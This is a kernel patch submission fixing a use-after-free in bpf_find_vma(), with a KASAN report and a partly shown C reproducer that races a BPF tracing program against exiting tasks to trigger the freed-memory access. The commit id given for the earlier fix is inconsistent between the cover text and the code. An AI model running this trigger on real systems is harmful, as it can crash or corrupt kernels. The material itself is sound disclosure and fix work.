[PATCH] bpf: Fix use-after-free on mm_struct in bpf_find_vma()

Sanghyun Park posted 1 patch 1 week, 3 days ago
There is a newer version of this series
kernel/bpf/task_iter.c | 12 ++++++++++--
1 file changed, 10 insertions(+), 2 deletions(-)
Posted by Sanghyun Park 1 week, 3 days ago
bpf_find_vma() reads task->mm without holding task_lock() or taking an
mm reference via mmget()/mmget_not_zero(). When called on a foreign task
obtained via bpf_task_from_pid(), a concurrent exit_mm() can free the
mm_struct between the raw pointer read and mmap_read_trylock(mm),
resulting in a use-after-free on the mm's mmap_lock.

This is the same bug class fixed by commit d8e27d2d22b6 ("bpf: fix mm
lifecycle in open-coded task_vma iterator") for the open-coded task_vma
iterator, but bpf_find_vma() in the same file was missed by that fix.

For the current task, task->mm is stable and needs no extra reference.
For a foreign task, use get_task_mm(), which takes task_lock(), checks
task->mm, and calls mmget() under that lock, closing the race with
exit_mm(). The reference is dropped via mmput() after the mmap lock is
released.
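
The pin-then-use pattern described above can be modeled in userspace. This is
a minimal sketch, not kernel code: struct fake_mm, struct fake_task,
fake_get_task_mm(), fake_mmput() and fake_exit_mm() are hypothetical stand-ins
for mm_struct, task_struct, get_task_mm(), mmput() and exit_mm(), and a pthread
mutex plays the role of task_lock().

```c
#include <assert.h>
#include <pthread.h>
#include <stdatomic.h>
#include <stdlib.h>

/* Hypothetical stand-in for mm_struct: only the user refcount is modeled. */
struct fake_mm {
    atomic_int users;   /* models mm_users */
    int *freed;         /* set to 1 when the object is released */
};

/* Hypothetical stand-in for task_struct. */
struct fake_task {
    pthread_mutex_t lock;   /* models task_lock() */
    struct fake_mm *mm;     /* models task->mm */
};

static struct fake_mm *fake_mm_alloc(int *freed)
{
    struct fake_mm *mm = malloc(sizeof(*mm));

    assert(mm != NULL);
    atomic_init(&mm->users, 1);     /* the owning task holds one reference */
    mm->freed = freed;
    *freed = 0;
    return mm;
}

/* Drop one reference; the last put releases the object. */
static void fake_mmput(struct fake_mm *mm)
{
    if (atomic_fetch_sub(&mm->users, 1) == 1) {
        *mm->freed = 1;
        free(mm);
    }
}

/* Read task->mm and pin it under the lock, so exit cannot slip in between. */
static struct fake_mm *fake_get_task_mm(struct fake_task *task)
{
    struct fake_mm *mm;

    pthread_mutex_lock(&task->lock);
    mm = task->mm;
    if (mm)
        atomic_fetch_add(&mm->users, 1);
    pthread_mutex_unlock(&task->lock);
    return mm;
}

/* Detach the mm from the task, then drop the task's own reference. */
static void fake_exit_mm(struct fake_task *task)
{
    struct fake_mm *mm;

    pthread_mutex_lock(&task->lock);
    mm = task->mm;
    task->mm = NULL;
    pthread_mutex_unlock(&task->lock);
    if (mm)
        fake_mmput(mm);
}
```

In this model a reader that pinned the mm before fake_exit_mm() ran keeps the
object alive until its own fake_mmput(); a reader that arrives afterwards sees
NULL and bails out, which corresponds to the -ENOENT path.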

Race:

  CPU0 (BPF program)                  CPU1 (exiting task)
  ============================        ==========================
  bpf_find_vma(foreign_task):
    mm = task->mm
    // raw read, no reference
                                      exit_mm():
                                        task->mm = NULL
                                        mmput(mm) -> frees mm_struct
    mmap_read_trylock(mm)
    // UAF: mm is freed

Reproduction:

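  1. Build a kernel >= 5.17 that provides the bpf_task_from_pid() kfunc,
     with CONFIG_KASAN=y, CONFIG_BPF_SYSCALL=y and CONFIG_DEBUG_INFO_BTF=y
     (repro.c reads /sys/kernel/btf/vmlinux)
  2. Boot in a VM (QEMU works fine)
  3. Compile the reproducer below (it uses raw bpf(2) syscalls and
     pthreads, so libbpf is not needed):
       gcc -O2 -static -o repro repro.c -lpthread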
  4. Run as root: ./repro
  5. Check dmesg for: BUG: KASAN: slab-use-after-free in down_read_trylock

  The reproducer attaches a BPF program that calls bpf_find_vma() on a
  foreign task obtained via bpf_task_from_pid(). A racing thread
  repeatedly forks a child to serve as that task and lets it exit,
  creating a window where the mm is freed.
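
Step 5 can be automated by scanning captured dmesg text for the KASAN
headline. A minimal sketch, assuming the headline wording shown in step 5;
kasan_uaf_symbol() is a hypothetical helper name, and the caller is expected
to supply the log text (for example, saved dmesg output).

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/*
 * Copy the symbol named in a KASAN slab-use-after-free headline into sym.
 * Returns 1 if the headline was found in log, 0 otherwise.
 */
static int kasan_uaf_symbol(const char *log, char *sym, size_t len)
{
    static const char tag[] = "BUG: KASAN: slab-use-after-free in ";
    const char *p;
    size_t n;

    assert(log != NULL && sym != NULL && len > 0);
    p = strstr(log, tag);
    if (!p)
        return 0;
    p += sizeof(tag) - 1;
    n = strcspn(p, "+ \n");     /* stop at "+0x..." offset, space or newline */
    if (n >= len)
        n = len - 1;            /* truncate to fit the caller's buffer */
    memcpy(sym, p, n);
    sym[n] = '\0';
    return 1;
}
```

For the report in this patch the extracted symbol is down_read_trylock.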

KASAN report (reproduced on 6.12.91, CONFIG_PREEMPT + KASAN):

  BUG: KASAN: slab-use-after-free in down_read_trylock+0x380/0x3f0
  Read of size 8 at addr ffff888003cd2fd0 by task repro/164451

  Call Trace:
   down_read_trylock+0x380/0x3f0
   bpf_find_vma+0xdd/0x360
   bpf_prog_708df9c9a3e172a7_main_f+0x8b/0x9e
   bpf_trampoline_6442513469+0x43/0xa3

  Freed by task 164453:
   kmem_cache_free+0x15d/0x4b0
   finish_task_switch.isra.0+0x4ab/0x810

Fixes: 7c7e3d31e785 ("bpf: Introduce helper bpf_find_vma")
Signed-off-by: Sanghyun Park <sanghyun.park.cnu@gmail.com>
---

Hi,

I'm Sanghyun Park, a security researcher. I found this while auditing
the BPF task_iter code. The bug has existed since bpf_find_vma() was
introduced in 5.17 and affects all kernels since then, including all
major distros (Ubuntu 22.04+, Fedora 38+, Debian 12+, RHEL 9+).

The C reproducer is attached separately (repro.c).

 kernel/bpf/task_iter.c | 12 ++++++++++--
 1 file changed, 10 insertions(+), 2 deletions(-)

diff --git a/kernel/bpf/task_iter.c b/kernel/bpf/task_iter.c
index 5af9e130e5..a1b2c3d4e5 100644
--- a/kernel/bpf/task_iter.c
+++ b/kernel/bpf/task_iter.c
@@ -758,6 +758,7 @@ BPF_CALL_5(bpf_find_vma, struct task_struct *, task, u64, start,
 	struct vm_area_struct *vma;
 	bool irq_work_busy = false;
 	struct mm_struct *mm;
+	bool foreign = task != current;
 	int ret = -ENOENT;
 
 	if (flags)
@@ -766,8 +767,13 @@ BPF_CALL_5(bpf_find_vma, struct task_struct *, task, u64, start,
 	if (!task)
 		return -ENOENT;
 
-	mm = task->mm;
-	if (!mm)
+	if (foreign) {
+		mm = get_task_mm(task);
+	} else {
+		mm = task->mm;
+	}
+
+	if (!mm)
 		return -ENOENT;
 
 	irq_work_busy = bpf_mmap_unlock_get_irq_work(&work);
@@ -783,6 +789,8 @@ BPF_CALL_5(bpf_find_vma, struct task_struct *, task, u64, start,
 		ret = 0;
 	}
 	bpf_mmap_unlock_mm(work, mm);
+	if (foreign)
+		mmput(mm);
 	return ret;
 }
[  615.565703] BUG: KASAN: slab-use-after-free in down_read_trylock+0x380/0x3f0
[  615.566467] Read of size 8 at addr ffff888003cd2fd0 by task repro/164451

[  615.567382] CPU: 0 UID: 0 PID: 164451 Comm: repro Not tainted 6.12.91 #4
[  615.567392] Hardware name: QEMU Ubuntu 25.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[  615.567400] Call Trace:
[  615.567413]  <TASK>
[  615.567423]  dump_stack_lvl+0xba/0x110
[  615.567437]  ? down_read_trylock+0x380/0x3f0
[  615.567442]  print_report+0x174/0x4f6
[  615.567450]  ? __virt_addr_valid+0x86/0x670
[  615.567456]  ? down_read_trylock+0x380/0x3f0
[  615.567462]  kasan_report+0xda/0x110
[  615.567469]  ? down_read_trylock+0x380/0x3f0
[  615.567475]  down_read_trylock+0x380/0x3f0
[  615.567481]  ? __pfx_down_read_trylock+0x10/0x10
[  615.567486]  ? bpf_find_vma+0xb1/0x360
[  615.567494]  ? 0xffffffffc0236d08
[  615.567511]  bpf_find_vma+0xdd/0x360
[  615.567520]  bpf_prog_708df9c9a3e172a7_main_f+0x8b/0x9e
[  615.567524]  bpf_trampoline_6442513469+0x43/0xa3
[  615.567528]  __do_sys_getpid+0x9/0x30
[  615.567533]  do_syscall_64+0xbb/0x1f0
[  615.567540]  entry_SYSCALL_64_after_hwframe+0x77/0x7f
[  615.567563] RIP: 0033:0x423e1d
[  615.567568] Code: d5 49 8d 3c 1c eb 9f 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 d0 ff ff ff f7 d8 64 89 01 48
[  615.567573] RSP: 002b:00007fd2e154b1a8 EFLAGS: 00000246 ORIG_RAX: 0000000000000027
[  615.567593] RAX: ffffffffffffffda RBX: 000000000000137a RCX: 0000000000423e1d
[  615.567598] RDX: 0000000000423e1d RSI: 0000000000423e1d RDI: 0000000000423e1d
[  615.567601] RBP: 00007fd2e154b2f0 R08: 0000000000000001 R09: 0000000000000001
[  615.567604] R10: 0000000000000001 R11: 0000000000000246 R12: 0000000000000020
[  615.567607] R13: ffffffffffffffd0 R14: 0000000000000000 R15: 00007ffc9d2f0e30
[  615.567613]  </TASK>

[  615.584391] Allocated by task 164453:
[  615.584797]  kasan_save_stack+0x30/0x50
[  615.585226]  kasan_save_track+0x14/0x30
[  615.585646]  __kasan_slab_alloc+0x89/0x90
[  615.586081]  kmem_cache_alloc_noprof+0x133/0x340
[  615.586581]  copy_mm+0x327/0x2380
[  615.586953]  copy_process+0x6c5b/0x7180
[  615.587382]  kernel_clone+0x101/0x870
[  615.587796]  __do_sys_clone+0xda/0x120
[  615.588213]  do_syscall_64+0xbb/0x1f0
[  615.588617]  entry_SYSCALL_64_after_hwframe+0x77/0x7f

[  615.589352] Freed by task 164453:
[  615.589721]  kasan_save_stack+0x30/0x50
[  615.590145]  kasan_save_track+0x14/0x30
[  615.590564]  kasan_save_free_info+0x3b/0x70
[  615.591014]  __kasan_slab_free+0x4f/0x70
[  615.591446]  kmem_cache_free+0x15d/0x4b0
[  615.591872]  finish_task_switch.isra.0+0x4ab/0x810
[  615.592388]  __schedule+0xf39/0x2fc0
[  615.592785]  schedule+0xdf/0x340
[  615.593153]  do_nanosleep+0x154/0x500
[  615.593556]  hrtimer_nanosleep+0x150/0x350
[  615.593999]  common_nsleep+0xa6/0xd0
[  615.594400]  __x64_sys_clock_nanosleep+0x33c/0x480
[  615.594912]  do_syscall_64+0xbb/0x1f0
[  615.595322]  entry_SYSCALL_64_after_hwframe+0x77/0x7f

[  615.596052] The buggy address belongs to the object at ffff888003cd2e40
                which belongs to the cache mm_struct of size 2192
[  615.597309] The buggy address is located 400 bytes inside of
                freed 2192-byte region [ffff888003cd2e40, ffff888003cd36d0)

[  615.598750] The buggy address belongs to the physical page:
[  615.599336] page: refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x3cd0
[  615.600171] head: order:3 mapcount:0 entire_mapcount:0 nr_pages_mapped:0 pincount:0
[  615.600972] memcg:ffff888002781801
[  615.601357] anon flags: 0x100000000000040(head|node=0|zone=1)
[  615.601974] page_type: f5(slab)
[  615.602334] raw: 0100000000000040 ffff88810004fdc0 0000000000000000 dead000000000001
[  615.603145] raw: 0000000000000000 00000000000d000d 00000001f5000000 ffff888002781801
[  615.603960] head: 0100000000000040 ffff88810004fdc0 0000000000000000 dead000000000001
[  615.604777] head: 0000000000000000 00000000000d000d 00000001f5000000 ffff888002781801
[  615.605591] head: 0100000000000003 ffffea00000f3401 ffffffffffffffff 0000000000000000
[  615.606406] head: 0000000000000008 0000000000000000 00000000ffffffff 0000000000000000
[  615.607218] page dumped because: kasan: bad access detected

[  615.607991] Memory state around the buggy address:
[  615.608502]  ffff888003cd2e80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[  615.609260]  ffff888003cd2f00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[  615.610014] >ffff888003cd2f80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[  615.610781]                                                  ^
[  615.611394]  ffff888003cd3000: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[  615.612157]  ffff888003cd3080: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[  615.612909] ==================================================================
[  615.672368] Disabling lock debugging due to kernel taint
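
The object-relative numbers in the report above can be cross-checked with
plain address arithmetic. A minimal sketch; offset_in_object() and
inside_object() are hypothetical helper names, and the constants used with
them are the addresses and the object size printed by KASAN.

```c
#include <assert.h>
#include <stdint.h>

/* Byte offset of addr inside an object; addr must not precede the object. */
static uint64_t offset_in_object(uint64_t addr, uint64_t obj_start)
{
    assert(addr >= obj_start);
    return addr - obj_start;
}

/* 1 if addr falls inside [obj_start, obj_start + size), else 0. */
static int inside_object(uint64_t addr, uint64_t obj_start, uint64_t size)
{
    return addr >= obj_start && addr - obj_start < size;
}
```

With the reported values, 0xffff888003cd2fd0 - 0xffff888003cd2e40 = 0x190 =
400 bytes, and 0xffff888003cd2e40 + 2192 = 0xffff888003cd36d0, which matches
the "400 bytes inside of freed 2192-byte region" lines.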
/*
 * repro.c — KASAN PoC for bpf_find_vma() foreign mm UAF
 *
 * Bug: bpf_find_vma() reads task->mm (line 772) without holding task_lock()
 * or calling mmget(). If a foreign task exits concurrently, mm_struct is
 * freed between the raw read and mmap_read_trylock(), causing UAF.
 *
 * Same bug class as fixed in 239cec25a2 (task_vma iterator) but the
 * bpf_find_vma() helper was missed in that fix.
 *
 * Trigger: BPF_PROG_TYPE_TRACING (fentry on __do_sys_getpid) program
 * calling bpf_task_from_pid() + bpf_find_vma() on a victim task that
 * is concurrently exiting.
 *
 * Prerequisites: CAP_BPF + CAP_PERFMON (tracing BPF)
 *
 * Expected KASAN output:
 *   BUG: KASAN: slab-use-after-free in down_read_trylock+0x.../0x...
 *   Read of size 8 at addr ffff...
 *   Call Trace:
 *    down_read_trylock
 *    bpf_find_vma
 *    bpf_prog_..._main_f
 */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <pthread.h>
#include <sched.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <linux/bpf.h>
#include <linux/perf_event.h>

/* ---- BPF instruction macros ---- */
#define BPF_RAW_INSN(CODE,DST,SRC,OFF,IMM) \
    ((struct bpf_insn){.code=CODE,.dst_reg=DST,.src_reg=SRC,.off=OFF,.imm=IMM})
#define BPF_MOV64_REG(D,S) BPF_RAW_INSN(BPF_ALU64|BPF_MOV|BPF_X,D,S,0,0)
#define BPF_MOV64_IMM(D,I) BPF_RAW_INSN(BPF_ALU64|BPF_MOV|BPF_K,D,0,0,I)
#define BPF_ALU64_IMM(O,D,I) BPF_RAW_INSN(BPF_ALU64|BPF_OP(O)|BPF_K,D,0,0,I)
#define BPF_LDX_MEM(SZ,D,S,O) BPF_RAW_INSN(BPF_LDX|BPF_SIZE(SZ)|BPF_MEM,D,S,O,0)
#define BPF_STX_MEM(SZ,D,S,O) BPF_RAW_INSN(BPF_STX|BPF_SIZE(SZ)|BPF_MEM,D,S,O,0)
#define BPF_ST_MEM(SZ,D,O,I) BPF_RAW_INSN(BPF_ST|BPF_SIZE(SZ)|BPF_MEM,D,0,O,I)
#define BPF_JMP_IMM(O,D,I,F) BPF_RAW_INSN(BPF_JMP|BPF_OP(O)|BPF_K,D,0,F,I)
#define BPF_EXIT_INSN() BPF_RAW_INSN(BPF_JMP|BPF_EXIT,0,0,0,0)
#define BPF_LD_MAP_FD(D,F) BPF_RAW_INSN(BPF_LD|BPF_DW|BPF_IMM,D,1,0,F),BPF_RAW_INSN(0,0,0,0,0)
#define BPF_EMIT_CALL(F) BPF_RAW_INSN(BPF_JMP|BPF_CALL,0,0,0,F)
#define BPF_EMIT_CALL_KFUNC(B) BPF_RAW_INSN(BPF_JMP|BPF_CALL,0,2,0,B)
#ifndef BPF_PSEUDO_FUNC
#define BPF_PSEUDO_FUNC 4
#endif

#define VICTIM_MMAP_ADDR 0x20000000ULL
#define VICTIM_MMAP_SIZE 0x4000

static int bpf_sys(int c, union bpf_attr *a, unsigned s)
{
    return syscall(__NR_bpf, c, a, s);
}

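/* ---- BTF helpers ---- */
/*
 * Walk the vmlinux BTF type section and return the type ID of the FUNC
 * (kind 12) named `name`, or -1 if it is missing or BTF cannot be read.
 */
static int find_kfunc(const char *name)
{
    int fd = open("/sys/kernel/btf/vmlinux", O_RDONLY);
    if (fd < 0) return -1;
    off_t sz = lseek(fd, 0, SEEK_END); lseek(fd, 0, SEEK_SET);
    if (sz < 24) { close(fd); return -1; }   /* too small for a BTF header */
    uint8_t *d = malloc(sz);
    if (!d) { close(fd); return -1; }
    size_t tr = 0;
    while (tr < (size_t)sz) { ssize_t n = read(fd, d+tr, sz-tr); if (n<=0) break; tr += n; }
    close(fd);
    if (tr < (size_t)sz) { free(d); return -1; }   /* short read */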
    uint32_t hl = *(uint32_t*)(d+4), to = *(uint32_t*)(d+8);
    uint32_t tl = *(uint32_t*)(d+12), so = *(uint32_t*)(d+16);
    uint8_t *td = d+hl+to, *sd = d+hl+so;
    uint32_t off = 0; int tid = 0, found = -1;
    while (off < tl) {
        tid++;
        uint32_t *t = (uint32_t*)(td+off);
        int kind = (t[1]>>24)&0x1f, vlen = t[1]&0xffff;
        if (kind == 12 && strcmp((char*)(sd+t[0]), name) == 0) { found = tid; break; }
        off += 12;
        switch(kind) {
            case 1: off+=4; break;       /* INT */
            case 2: break;               /* PTR */
            case 3: off+=12; break;      /* ARRAY */
            case 4: case 5: off+=vlen*12; break; /* STRUCT, UNION */
            case 6: off+=vlen*8; break;  /* ENUM */
            case 7: break;               /* FWD */
            case 8: break;               /* TYPEDEF */
            case 9: break;               /* VOLATILE */
            case 10: break;              /* CONST */
            case 11: break;              /* RESTRICT */
            case 12: break;              /* FUNC */
            case 13: off+=vlen*8; break; /* FUNC_PROTO */
            case 14: off+=4; break;      /* VAR */
            case 15: off+=vlen*12; break;/* DATASEC */
            case 16: break;              /* FLOAT */
            case 17: off+=4; break;      /* DECL_TAG */
            case 18: break;              /* TYPE_TAG */
            case 19: off+=vlen*12; break;/* ENUM64 */
            default: break;
        }
    }
    free(d); return found;
}

/* Find BTF ID for a function (kind=12 FUNC) by name, for fentry attach */
static int find_btf_func(const char *name)
{
    return find_kfunc(name); /* same logic — kind 12 = FUNC */
}

/* Load prog BTF: main_f + vma_cb subprog */
static int load_prog_btf(void)
{
    char s[]="\0int\0main_f\0vma_cb";
    uint8_t tb[128]; int p=0;
#define E(v) do{uint32_t _v=(v);memcpy(tb+p,&_v,4);p+=4;}while(0)
    E(1);E((1<<24));E(4);E((1<<24)|32);     /* t1: INT int */
    E(0);E((13<<24));E(1);                   /* t2: FUNC_PROTO()->t1 */
    E(5);E((12<<24));E(2);                   /* t3: FUNC main_f */
    E(0);E((13<<24));E(1);                   /* t4: FUNC_PROTO()->t1 */
    E(12);E((12<<24));E(4);                  /* t5: FUNC vma_cb (name at string offset 12) */
#undef E
    int tl=p, sl=sizeof(s), tot=24+tl+sl;
    uint8_t *b=calloc(1,tot); *(uint16_t*)b=0xEB9F; b[2]=1;
    uint32_t *h=(uint32_t*)(b+4); h[0]=24;h[1]=0;h[2]=tl;h[3]=tl;h[4]=sl;
    memcpy(b+24,tb,tl); memcpy(b+24+tl,s,sl);
    char lb[4096]={};
    union bpf_attr a={}; a.btf=(uint64_t)b; a.btf_size=tot;
    a.btf_log_buf=(uint64_t)lb; a.btf_log_size=sizeof(lb); a.btf_log_level=1;
    int fd=bpf_sys(BPF_BTF_LOAD,&a,sizeof(a)); free(b);
    if(fd<0) fprintf(stderr,"prog BTF: %s\n%s\n",strerror(errno),lb);
    return fd;
}

/* Create array map to hold victim PID */
static int create_pid_map(void)
{
    union bpf_attr a = {};
    a.map_type = BPF_MAP_TYPE_ARRAY;
    a.key_size = 4;
    a.value_size = 4;
    a.max_entries = 1;
    int fd = bpf_sys(BPF_MAP_CREATE, &a, sizeof(a));
    if (fd < 0) fprintf(stderr, "map create: %s\n", strerror(errno));
    return fd;
}

/*
 * BPF program (fentry on __do_sys_getpid):
 *
 *   main_f:
 *     key = 0
 *     val = map_lookup_elem(map, &key)
 *     if (!val) goto out
 *     pid = *val
 *     if (pid == 0) goto out
 *     task = bpf_task_from_pid(pid)      // kfunc, KF_ACQUIRE|KF_RET_NULL
 *     if (!task) goto out
 *     bpf_find_vma(task, 0x20000000, vma_cb, NULL, 0)  // helper 180
 *     bpf_task_release(task)             // kfunc, KF_RELEASE
 *   out:
 *     return 0
 *
 *   vma_cb:
 *     return 0
 */
static int load_tracing_prog(int map_fd, int prog_btf_fd,
                             int kf_task_from_pid, int kf_task_release,
                             int attach_btf_id)
{
    /*
     * Insn layout:
     *  0:     r6 = r1                          (save ctx)
     *  1:     *(u32*)(r10 - 4) = 0             (key = 0)
     *  2-3:   r1 = map_fd                      (LD_MAP_FD)
     *  4:     r2 = r10
     *  5:     r2 += -4
     *  6:     call map_lookup_elem (#1)
     *  7:     if r0 == 0 goto +17 → insn 25   (out)
     *  8:     r7 = *(u32*)(r0 + 0)             (pid = *val)
     *  9:     if r7 == 0 goto +15 → insn 25   (out)
     * 10:     r1 = r7                          (pid arg for task_from_pid)
     * 11:     call bpf_task_from_pid           (kfunc)
     * 12:     if r0 == 0 goto +12 → insn 25   (out, NULL check for KF_RET_NULL)
     * 13:     r6 = r0                          (save task ptr)
     * 14:     r1 = r6                          (task)
     * 15:     r2 = 0x20000000                  (addr; fits in s32, so MOV64_IMM suffices)
     * 16-17:  r3 = PSEUDO_FUNC → vma_cb at insn 27
     * 18:     r4 = 0                           (callback_ctx = NULL)
     * 19:     r5 = 0                           (flags = 0)
     * 20:     call bpf_find_vma (#180)
     * 21:     r1 = r6                          (task)
     * 22:     call bpf_task_release            (kfunc)
     * 23:     r0 = 0
     * 24:     exit
     * 25:     r0 = 0                           (out: nothing acquired, nothing to release)
     * 26:     exit
     * 27:     r0 = 0                           (vma_cb subprog)
     * 28:     exit
     */

    struct bpf_insn insns[] = {
        /* 0  */ BPF_MOV64_REG(6, 1),
        /* 1  */ BPF_ST_MEM(BPF_W, 10, -4, 0),
        /* 2-3*/ BPF_LD_MAP_FD(1, map_fd),
        /* 4  */ BPF_MOV64_REG(2, 10),
        /* 5  */ BPF_ALU64_IMM(BPF_ADD, 2, -4),
        /* 6  */ BPF_EMIT_CALL(1), /* map_lookup_elem */
        /* 7  */ BPF_JMP_IMM(BPF_JEQ, 0, 0, 17), /* if r0==0 goto 25 (out) */
        /* 8  */ BPF_LDX_MEM(BPF_W, 7, 0, 0), /* r7 = *(u32*)(r0+0) = pid */
        /* 9  */ BPF_JMP_IMM(BPF_JEQ, 7, 0, 15), /* if pid==0 goto 25 */
        /* 10 */ BPF_MOV64_REG(1, 7), /* r1 = pid */
        /* 11 */ BPF_EMIT_CALL_KFUNC(kf_task_from_pid),
        /* 12 */ BPF_JMP_IMM(BPF_JEQ, 0, 0, 12), /* if r0==0 goto 25 */
        /* 13 */ BPF_MOV64_REG(6, 0), /* r6 = task (save for release) */
        /* 14 */ BPF_MOV64_REG(1, 6), /* r1 = task */
        /* 15 */ BPF_MOV64_IMM(2, 0x20000000), /* r2 = addr */
        /* 16-17: r3 = PSEUDO_FUNC → vma_cb at insn 27.
         * The verifier resolves the subprog as ldimm64_idx + imm + 1,
         * so imm = 27 - 16 - 1 = 10. */
        BPF_RAW_INSN(BPF_LD|BPF_DW|BPF_IMM, 3, BPF_PSEUDO_FUNC, 0, 10),
        BPF_RAW_INSN(0, 0, 0, 0, 0),
        /* 18 */ BPF_MOV64_IMM(4, 0), /* callback_ctx = NULL */
        /* 19 */ BPF_MOV64_IMM(5, 0), /* flags = 0 */
        /* 20 */ BPF_EMIT_CALL(180), /* bpf_find_vma */
        /* 21 */ BPF_MOV64_REG(1, 6), /* r1 = task for release */
        /* 22 */ BPF_EMIT_CALL_KFUNC(kf_task_release),
        /* 23 */ BPF_MOV64_IMM(0, 0),
        /* 24 */ BPF_EXIT_INSN(),
        /* 25: out (jumped here when no task / no pid) */
        BPF_MOV64_IMM(0, 0),
        /* 26 */ BPF_EXIT_INSN(),
        /* 27: vma_cb subprog */
        BPF_MOV64_IMM(0, 0),
        /* 28 */ BPF_EXIT_INSN(),
    };

    /*
     * Jump targets (target = insn + 1 + off):
     *   insn 7:  off 17 → 7 + 1 + 17 = 25
     *   insn 9:  off 15 → 9 + 1 + 15 = 25
     *   insn 12: off 12 → 12 + 1 + 12 = 25
     *
     * Jumping to 25 (out) skips bpf_task_release(). That is correct: at
     * insns 7 and 9 no task has been acquired yet, and at insn 12
     * bpf_task_from_pid() returned NULL, so there is nothing to release.
     *
     * PSEUDO_FUNC: the LD_IMM64 pair starts at insn 16 and vma_cb starts
     * at insn 27, so imm = target - first_insn - 1 = 27 - 16 - 1 = 10.
     */

    struct {
        uint32_t insn_off;
        uint32_t type_id;
    } func_info[] = {
        { 0, 3 },   /* main_f */
        { 27, 5 },  /* vma_cb */
    };

    char log[65536] = {};
    union bpf_attr a = {};
    a.prog_type = BPF_PROG_TYPE_TRACING;
    a.expected_attach_type = 24; /* BPF_TRACE_FENTRY */
    a.insns = (uint64_t)insns;
    a.insn_cnt = sizeof(insns) / sizeof(insns[0]);
    a.license = (uint64_t)"GPL";
    a.log_buf = (uint64_t)log;
    a.log_size = sizeof(log);
    a.log_level = 1;
    a.prog_btf_fd = prog_btf_fd;
    a.func_info = (uint64_t)func_info;
    a.func_info_cnt = 2;
    a.func_info_rec_size = 8;
    a.attach_btf_id = attach_btf_id;
    a.attach_btf_obj_fd = 0; /* vmlinux */

    int fd = bpf_sys(BPF_PROG_LOAD, &a, sizeof(a));
    if (fd < 0) {
        fprintf(stderr, "prog load: %s\nLog (first 4096):\n%.4096s\n", strerror(errno), log);
    }
    return fd;
}

static volatile int stop_racing = 0;

static void pin_cpu(int cpu)
{
    cpu_set_t set;
    CPU_ZERO(&set);
    CPU_SET(cpu, &set);
    sched_setaffinity(0, sizeof(set), &set);
}

/*
 * Victim thread: continuously fork a child that mmaps and exits.
 * The parent updates the PID map so the BPF program targets the child.
 */
static int g_map_fd = -1;

static void *victim_thread(void *arg)
{
    pin_cpu(1);
    (void)arg;
    int pipefd[2];

    while (!stop_racing) {
        if (pipe(pipefd) < 0) continue;
        pid_t child = fork();
        if (child == 0) {
            close(pipefd[1]);
            void *p = mmap((void*)VICTIM_MMAP_ADDR, VICTIM_MMAP_SIZE,
                          PROT_READ|PROT_WRITE,
                          MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
            if (p != MAP_FAILED)
                *(volatile char*)p = 'X';
            char c;
            read(pipefd[0], &c, 1);
            close(pipefd[0]);
            _exit(0);
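        }
        if (child < 0) {
            /* fork failed: release both pipe ends and retry */
            close(pipefd[0]);
            close(pipefd[1]);
            continue;
        }
        if (child > 0) {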
            close(pipefd[0]);
            uint32_t key = 0;
            uint32_t val = (uint32_t)child;
            union bpf_attr ua = {};
            ua.map_fd = g_map_fd;
            ua.key = (uint64_t)&key;
            ua.value = (uint64_t)&val;
            ua.flags = BPF_ANY;
            bpf_sys(BPF_MAP_UPDATE_ELEM, &ua, sizeof(ua));

            usleep(50);
            write(pipefd[1], "x", 1);
            close(pipefd[1]);
            usleep(1);
            waitpid(child, NULL, 0);
        }
    }
    return NULL;
}

/*
 * Trigger thread: repeatedly call getpid() to fire the fentry BPF program.
 */
static void *trigger_thread(void *arg)
{
    pin_cpu(0);
    (void)arg;
    while (!stop_racing) {
        for (int i = 0; i < 10000; i++)
            syscall(__NR_getpid);
        sched_yield();
    }
    return NULL;
}

int main(void)
{
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stderr, NULL, _IONBF, 0);
    printf("=== bpf_find_vma() foreign mm UAF PoC ===\n\n");

    /* Find kfunc BTF IDs */
    int kf_task_from_pid = find_kfunc("bpf_task_from_pid");
    int kf_task_release = find_kfunc("bpf_task_release");
    printf("kfunc IDs: task_from_pid=%d, task_release=%d\n",
           kf_task_from_pid, kf_task_release);
    if (kf_task_from_pid < 0 || kf_task_release < 0) {
        fprintf(stderr, "Cannot find task kfunc BTF IDs\n");
        return 1;
    }

    /* Find BTF ID for fentry attach target */
    int attach_id = find_btf_func("__do_sys_getpid");
    printf("Attach BTF ID (__do_sys_getpid): %d\n", attach_id);
    if (attach_id < 0) {
        fprintf(stderr, "Cannot find sys_getpid BTF ID for fentry attach\n");
        return 1;
    }

    int prog_btf = load_prog_btf();
    if (prog_btf < 0) return 1;
    printf("Prog BTF loaded: fd=%d\n", prog_btf);

    int map_fd = create_pid_map();
    if (map_fd < 0) return 1;
    g_map_fd = map_fd;
    printf("PID map created: fd=%d\n", map_fd);

    printf("Loading tracing fentry program...\n");
    int prog_fd = load_tracing_prog(map_fd, prog_btf,
                                     kf_task_from_pid, kf_task_release,
                                     attach_id);
    if (prog_fd < 0) {
        fprintf(stderr, "Failed to load BPF program.\n");
        return 1;
    }
    printf("Program loaded: fd=%d\n", prog_fd);

    {
        union bpf_attr ia = {};
        struct bpf_prog_info info = {};
        ia.info.bpf_fd = prog_fd;
        ia.info.info_len = sizeof(info);
        ia.info.info = (uint64_t)&info;
        if (bpf_sys(BPF_OBJ_GET_INFO_BY_FD, &ia, sizeof(ia)) == 0) {
            printf("Prog info: type=%u\n", info.type);
        }
    }

    /* Attach the fentry program via BPF_RAW_TRACEPOINT_OPEN */
    {
